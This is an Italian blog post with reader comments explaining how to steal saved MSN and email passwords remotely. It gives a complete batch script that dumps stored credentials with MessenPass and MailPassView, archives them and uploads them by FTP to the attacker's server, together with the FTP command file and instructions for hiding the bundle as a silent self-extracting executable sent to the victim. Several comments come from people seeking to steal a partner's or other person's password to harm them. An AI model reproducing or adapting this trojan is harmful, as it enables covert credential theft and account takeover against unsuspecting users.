Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView

In questo primo post vi spiego come usare i programmini “MessenPass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB.

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate di Msn o di account mail memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”,(vedi qui su come usare anche altri programmi, stà tutto nel mettere l’eseguibile con “/sverhtml “nel batch) il file eseguibile di WinRar(installatelo e prelevate da c:/programmi/winrar/rar.exe), un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Per uno spazio web è necessario uno con accesso ftp (es.netsons.org) in cui registrarsi e abilitare l’ftp se necesario. Potete usare FileZilla per la gestione ftp.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l’output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l’output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l’username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni! D

Abbastanza facile no?

Foto di neingeist su flickr.com

Fonte underground0

22 Risposte

  1. ho bisogno di un genio del pc.. o meglio di un operatore tim… ragazzi mi sono fidata della persona sbagliata ..lui sa tutto di me io niente di lui!!! avendo il suo ip si puo risalire alla sua linea telefonica? lui si collega con scheda prepagata TIM… vi scongiur aiutatemi… vi lascio il mio contatto “janaraa@hotmail.it” GRAZIE!

  2. ciao ragazzi mi serve aiuto devo riuscire ad avere la password di msn del mio e ragazzo xkè lui sa troppo di me e gli volevo rovinare alcune cose vi prego aiutatemi qst è il mio contatto christal90@hotmail.it

  3. praticamente nn ci hai detto nulla =(=( nn c é un modo + semplice per scovare le password email?
    qualche programma abb facile da usare per chi nn é un genio del pc… anche se tu avessi scritto quei codici senza errori io nn sarei stato capace di usarli per rubare passowrd….lolol hai contatto msn??? mi piacerebbe approfondire un pò questo discorso…. grazie ciao!

  4. beh..ho scritto il necessario… non posso scrivere il codice reale! è illegale! (cmq x msn vedi la sidebar all’inizio… c’è la mail di msn)
    e poi di programmi “facili” non ce n’è… sennò sarebbe troppo facile e la sicurezza andrebbe a quel paese! però di metodi c’è ne tanti..solo che bisogna impegnarsi e avere tempo…

  5. Ciao!..
    Mi sto davvero scervellando e non ti scrivo per implorarti di farmi sapere il codice corretto, ma ti chiedo soltanto “che tipo” di errori hai messo.. Nel senso, codice corretto ma non funziona con Iexpress, codice sbagliato dal punto di vista “ortografico”.. Insomma, in che modo/dove devo cercare gli errori per tentare di correggerli?!
    Ciao e davvero complimenti per la genialità!!!!! =)

  6. Ah, un’altra cosa!.. Sono scorretti entrambi i codici (sia bat che txt) oppure soltanto uno?!

  7. @Curiosa: ahah… sinceramente non ricordo gli errori.. mi sà che in un giorno di buon umore vi ho reso + facile la vita aggiustandoli 😄 cmq tu crea i file e esegui il .bat tramite cmd (start>esegui>cmd.exe) e ti dice se c’è qualche errore tipo nel ftp o cosa…ciao!

  8. Potresti contattarmi per favore ?

  9. lol,raga , xke volete fare lamerate?
    1 ci sono mille guide su come prendere òle pass, ma niubbi????
    bho lamer???bho
    tutti alla carica sti lamer di merdaXD
    studiate grazie

  10. ciao piacere angelo mi piacerebbe molto parlare cn te se e possibbile in msn ….

  11. Ciao!!!
    Sn molto interessato, e nn riesco a contattarti direttamente dal link sulla tua sidebar….contattami ti prego!!!!

  12. Confermo il funzionamento di questo metodo,io lo ho provato (su me stesso) modificando il codice e funziona, poi ho detto ad un mio amico di provarlo (lui sapeva che serviva x rubare le pass) e glielo riconosce cm virus quindi è inutile…

  13. Ma scusa, ammesso anche che sia illegale, il codice lo puoi rilasciare. metti per iscritto che non te ne assumi alcuna responsabilità dell’uso che ne verrà fatto. Se devi condividere conoscenze con la gente fallo in modo completo almeno. -.-

  14. o bisogno di qlcn ke mi spieghi bn come si trovano pass di msn…. devo fare una cosa ad uno stronzo….

  15. nn so come hanno fatto a rubarmi il mio primo conttato di msn

  16. vi prego mi serve disperatamente il vostro aiuto x le password mi potete aiutare? il mio account di msn è thebestboy4ever@hotmail.it

  17. Ciao, vedo che sei forte in materia ma purtroppo io sono debole e quindi ho qualche difficoltà a realizzare il programma da te descritto se mi puoi dare un aiuto te ne sarei grato. Un saluto

  18. sempre la solita roba… lol😄

  19. ciao, speravo in un piccolo aiuto anzi ancora spero perchè mi è impossibile trovare eventuali errori nel tuo programma.
    Ciao
    Mario

  20. Gentili utenti,ho bisogno di prendere la password di un contatto msn.Se qualcuno lo può fare mi contatti gentilmente.ve ne sarò grato.è importante

I commenti sono chiusi.

